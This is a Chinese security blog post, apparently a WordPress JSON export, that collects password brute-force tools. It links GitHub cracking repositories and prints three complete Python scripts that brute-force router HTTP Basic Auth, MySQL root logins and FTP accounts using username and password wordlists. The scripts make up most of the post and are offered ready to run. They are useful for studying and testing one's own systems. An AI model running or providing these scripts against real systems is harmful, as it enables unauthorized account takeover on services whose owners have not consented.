{"id":1642,"date":"2014-11-30T13:01:17","date_gmt":"2014-11-30T13:01:17","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=1642"},"modified":"2017-03-07T16:42:11","modified_gmt":"2017-03-07T08:42:11","slug":"%e4%b8%80%e4%ba%9b%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e8%84%9a%e6%9c%ac%e7%9a%84%e6%94%b6%e9%9b%86","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/1642.html","title":{"rendered":"\u4e00\u4e9b\u66b4\u529b\u7834\u89e3\u811a\u672c\u7684\u6536\u96c6"},"content":{"rendered":"<p>=Start=<\/p>\n<p>\u4e00\u76f4\u5f88\u559c\u6b22\u6536\u85cf\u4e1c\u897f\uff0c\u518d\u52a0\u4e0a\u73b0\u5728\u5e72\u7684\u8fd9\u4efd\u5de5\u4f5c\uff0c\u6240\u4ee5\uff0c\u6ca1\u4e8b\u624b\u4e0a\u5907\u4efd\u4e00\u4e9b\u66b4\u529b\u7834\u89e3\u7684\u811a\u672c\u5c31\u5f88\u6709\u5fc5\u8981\u4e86\uff0c\u867d\u7136\u8bf4\u9ed1\u5ba2\u6700\u91cd\u8981\u7684\u662f\u81ea\u5df1\u7684\u7f16\u7a0b\u80fd\u529b\uff08\u5c06\u60f3\u6cd5\u53d8\u73b0\u7684\u80fd\u529b\uff09\uff0c\u4f46\u662f\u5728\u80fd\u529b\u5c1a\u672a\u8fbe\u5230\u4e4b\u524d\uff0c\u53ef\u4ee5\u901a\u8fc7\u9605\u8bfb\u522b\u4eba\u7684\u811a\u672c\u6765\u5f97\u5230\u63d0\u9ad8\uff08\u7279\u522b\u662f\u73b0\u5728\u6709\u4e86GitHub\u8fd9\u4e48\u7ed9\u529b\u7684\u5de5\u5177\u4e4b\u540e\uff0c\u80fd\u770b\u5230\u5f88\u591a\u4eba\u7684\u5206\u4eab\uff0c\u5e0c\u671b\u6709\u673a\u4f1a\u81ea\u5df1\u4e5f\u80fd\u5206\u4eab\u4e00\u4e9b\u4e0d\u9519\u7684\u4e1c\u897f\u7ed9\u5927\u5bb6~~\uff09<\/p>\n<hr \/>\n<h6>\u641c\u7d22\u7684tips\uff1a<\/h6>\n<ul>\n<li>sqlmap\u7684tamper\u6a21\u5757\u503c\u5f97\u5b66\u4e60\uff1b<\/li>\n<li>\u5728GitHub\u4e0a\u641c\u7d22\u201cbruteforce\u201d\u800c\u4e0d\u662f\u201ccrack\u201d\u66f4\u6613\u4e8e\u641c\u5230\u66b4\u529b\u7834\u89e3\u7684\u811a\u672c\uff1b<\/li>\n<li>\u5728sourceforge.net\u3001FreeBuf\u300191ri.org\u7b49\u7f51\u7ad9\u4e0a\u90fd\u4f1a\u6709\u4e00\u4e9b\u4e0d\u9519\u7684\u53d1\u73b0\uff1b<\/li>\n<\/ul>\n<h6>GitHub\u4e0a\u7684\u4e00\u4e9b\u94fe\u63a5\uff1a<\/h6>\n<ul>\n<li><a href=\"https:\/\/github.com\/TheRook\/subbrute\" target=\"_blank\">TheRook\/subbrute<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/AmineCherrai\/bruteforce\" target=\"_blank\">AmineCherrai\/bruteforce<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/d4rkcat\/ftpcrack\" target=\"_blank\">d4rkcat\/ftpcrack<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/daige\/sshcrack\" target=\"_blank\">daige\/sshcrack<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/paramiko\/paramiko\" target=\"_blank\">paramiko\/paramiko<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/lijiejie\/htpwdScan\" target=\"_blank\">lijiejie\/htpwdScan<\/a><br \/>\n<a href=\"https:\/\/github.com\/lijiejie\/sibDomains\" target=\"_blank\">lijiejie\/sibDomains<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/wklken\/pytools\" target=\"_blank\">wklken\/pytools<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/rischanlab\/bruteforce_py\" target=\"_blank\">rischanlab\/bruteforce_py<\/a><\/li>\n<\/ul>\n<h6>\u4e00\u4e9b\u811a\u672c\u6837\u4f8b\uff08\u8def\u7531\u5668\u3001MySQL\u3001ftp\uff09\uff1a<\/h6>\n<pre class=\"lang:default decode:true\">#!\/usr\/bin\/env python\r\n# coding:utf-8\r\nimport base64\r\nimport urllib2\r\nimport Queue\r\nimport threading, re, sys\r\nqueue = Queue.Queue()\r\nclass Rout_thread(threading.Thread):\r\n    def __init__(self, queue, passwd):\r\n        threading.Thread.__init__(self)\r\n        self.queue = queue\r\n        self.passwordlist = passwd\r\n    def run(self):\r\n        self.user = queue.get()\r\n        for self.passwd in self.passwordlist:\r\n            request = urllib2.Request(\"http:\/\/\"+target)\r\n            psw_base64 = \"Basic \" + base64.b64encode(self.user + \":\" + self.passwd)\r\n            request.add_header('Authorization', psw_base64)\r\n            try:\r\n                response = urllib2.urlopen(request)\r\n                print \"[+]Correct! Username: %s, password: %s\" % (self.user, self.passwd)\r\n                fp3 = open('log.txt', 'a')\r\n                fp3.write(self.user+'||'+self.passwd+'rn')\r\n                fp3.close()\r\n            except urllib2.HTTPError:\r\n                print \"[-]password:%s Error!\" % (self.passwd)\r\n\r\nif __name__ == '__main__':\r\n    passwordlist = []\r\n    line = 20\r\n    threads = []\r\n    global target\r\n    target = raw_input(\"input ip:\")\r\n    fp  = open(\"user.txt\")\r\n    fp2 = open(\"passwd.txt\")\r\n    for user in fp.readlines():\r\n        queue.put(user.split('n')[0])\r\n    for passwd in fp2.readlines():\r\n        passwordlist.append(passwd.split('n')[0])\r\n    #print passwordlist\r\n\r\n    fp.close()\r\n    fp2.close()\r\n    for i in range(line):\r\n        a = Rout_thread(queue, passwordlist)\r\n        a.start()\r\n        threads.append(a)\r\n    for j in threads:\r\n        j.join()<\/pre>\n<pre class=\"lang:default decode:true\">#!\/usr\/bin\/env python\r\n#coding=utf-8\r\nimport Queue\r\nfrom threading import Thread\r\nimport sys\r\nimport MySQLdb\r\nimport time\r\n\r\nclass End():\r\n\tdef __init__(self):\r\n\t\tself.end = False\r\n\tdef Finish(self):\r\n\t\tself.end = True\r\n\tdef GetEnd(self):\r\n\t\treturn self.end\r\n\r\nclass Connection(Thread):\r\n\tdef __init__(self, queue, TheEnd):\r\n\t\tThread.__init__(self)\r\n\t\tself.queue = queue\r\n\t\tself.TheEnd = TheEnd\r\n\r\n\tdef run(self):\r\n\t\twhile (not self.TheEnd.GetEnd()) and (not self.queue.empty()):\r\n\t\t\tpwd = self.queue.get()\r\n\t\t\ttry:\r\n\t\t\t\tdbConn = MySQLdb.Connect(user = 'root', passwd = pwd, host = \"127.0.0.1\", db = 'mysql')\r\n\t\t\texcept:\r\n\t\t\t\tprint \"[+]root:\" + pwd + \" Connect wrong..\"\r\n\t\t\t\tcontinue\r\n\t\t\tprint \"[+]root:\" + pwd + \" Connect success..\"\r\n\t\t\tself.TheEnd.Finish()\r\n\r\ndef main():\r\n\tqueue=Queue.Queue()\r\n\tTheEnd = End()\r\n\tpwds = [line.rstrip() for line in open(\"pass.txt\")]\r\n\tfor pwd in pwds:\r\n\t\tqueue.put(pwd)\r\n\tinitsize = queue.qsize()\r\n\ttested = 0\r\n\tthreads = 8    #\u4fee\u6539\u7ebf\u7a0b\u5904\r\n\tfor i in range(0, int(threads)):\r\n\t\tConnection(queue, TheEnd).start()\r\n\twhile (not TheEnd.GetEnd()) and (not queue.empty()):\r\n\t\ttime.sleep(2)\r\n\t\tactsize = queue.qsize()\r\n\t\ttested = initsize - actsize\r\n\t\tprint 'use %i password | Remaining %i password ' %(tested, actsize)\r\n\r\nif __name__ == '__main__':\r\n\tmain()<\/pre>\n<pre class=\"lang:default decode:true \">#!\/usr\/bin\/env python\r\n# -*- coding: utf_8 -*-\r\n\r\nimport ftplib, socket, re, sys, time\r\n\r\ndef usage():\r\n    if len(sys.argv) != 4:\r\n        print \"\u7528\u6cd5: ftpbrute.py \u5f85\u7834\u89e3\u7684ip\/domain \u7528\u6237\u540d\u5217\u8868 \u5b57\u5178\u5217\u8868\"\r\n        print \"\u5b9e\u4f8b: ftpbrute.py 127.0.0.1 user.txt pass.txt\"\r\n        sys.exit()\r\n\r\ndef ftp_anon(host):\r\n    try:\r\n        print 'n[+] \u6d4b\u8bd5\u533f\u540d\u767b\u9646\u2026\u2026n'\r\n        ftp = ftplib.FTP()\r\n        ftp.connect(host, 21, 10)\r\n        ftp.login()\r\n        ftp.retrlines('LIST')\r\n        ftp.quit()\r\n        print 'n[+] \u533f\u540d\u767b\u9646\u6210\u529f\u2026\u2026'\r\n    except ftplib.all_errors:\r\n        print 'n[-] \u533f\u540d\u767b\u9646\u5931\u8d25\u2026\u2026'\r\n\r\ndef ftp_crack(host, user, pwd):\r\n    try:\r\n        ftp = ftplib.FTP()\r\n        ftp.connect(host, 21, 10)\r\n        ftp.login(user, pwd)\r\n        ftp.retrlines('LIST')\r\n        ftp.quit()\r\n        print 'n[+] \u7834\u89e3\u6210\u529f\uff0c\u7528\u6237\u540d\uff1a' + user + ' \u5bc6\u7801\uff1a' + pwd\r\n    except ftplib.all_errors:\r\n        pass\r\n\r\nif __name__ == '__main__':\r\n    start_time = time.time()\r\n    usage()\r\n    if re.match(r'd{1,3}.d{1,3}.d{1,3}.d{1,3}', sys.argv[1]):\r\n        host = sys.argv[1]\r\n    else:\r\n        host = socket.gethostbyname(sys.argv[1])\r\n    userlist = [x.rstrip() for x in open(sys.argv[2])]\r\n    passlist = [x.rstrip() for x in open(sys.argv[3])]\r\n    print '[+] Target:', host\r\n    print '[+] Userlist:', len(userlist)\r\n    print '[+] Passlist:', len(passlist)\r\n    ftp_anon(host)\r\n    print 'n[+] \u66b4\u529b\u7834\u89e3\u6d4b\u8bd5\u4e2d\u2026\u2026n'\r\n    for user in userlist:\r\n        for pwd in passlist:\r\n            ftp_crack(host, user, pwd)\r\n    print 'n[+] \u7834\u89e3\u5b8c\u6210\uff0c\u7528\u65f6\uff1a %d \u79d2' % (time.time() - start_time)<\/pre>\n<p>\u2026\u2026\u5f85\u7eed\u2026\u2026<\/p>\n<h6>\u5728\u6267\u884c\u8fc7\u7a0b\u4e2d\u7684\u7ecf\u9a8c\u603b\u7ed3\uff1a<\/h6>\n<ol>\n<li>\u66b4\u529b\u7834\u89e3\u2014\u2014\u5b57\u5178\u662f\u51b3\u5b9a\u6027\u56e0\u7d20\uff08\u7528\u6237\u540d\u5b57\u5178\u3001\u5bc6\u7801\u5b57\u5178\uff09\uff1b<\/li>\n<li>\u5982\u679c\u60f3\u8981\u5feb\u901f\u5f97\u5230\u7ed3\u679c\uff0c\u5148\u4f7f\u7528\u73b0\u6210\u7684\u5de5\u5177\uff0c\u800c\u4e0d\u662f\u81ea\u5df1\u91cd\u590d\u9020\u8f6e\u5b50\uff08\u4e0d\u8fc7\u81ea\u5df1\u9700\u8981\u660e\u767d\u5176\u4e2d\u7684\u539f\u7406\uff09\uff1b<\/li>\n<li>\u5408\u7406\u5229\u7528\/\u7ed3\u5408\u73b0\u6210\u7684\u5de5\u5177\uff0c\u56de\u8fbe\u5230\u4e8b\u534a\u529f\u500d\u7684\u6548\u679c\u3002<\/li>\n<\/ol>\n<p>=END=<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=Start= \u4e00\u76f4\u5f88\u559c\u6b22\u6536\u85cf\u4e1c\u897f\uff0c\u518d\u52a0\u4e0a\u73b0\u5728\u5e72\u7684\u8fd9\u4efd\u5de5\u4f5c\uff0c\u6240\u4ee5\uff0c\u6ca1\u4e8b\u624b\u4e0a\u5907\u4efd\u4e00\u4e9b\u66b4\u529b\u7834\u89e3\u7684\u811a\u672c\u5c31\u5f88\u6709\u5fc5\u8981\u4e86\uff0c [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23,7,25,12],"tags":[234,108],"class_list":["post-1642","post","type-post","status-publish","format-standard","hentry","category-knowledgebase-2","category-programing","category-security","category-tools","tag-bruteforce","tag-crack"],"views":2636,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/1642","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=1642"}],"version-history":[{"count":1,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/1642\/revisions"}],"predecessor-version":[{"id":3249,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/1642\/revisions\/3249"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=1642"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=1642"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=1642"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}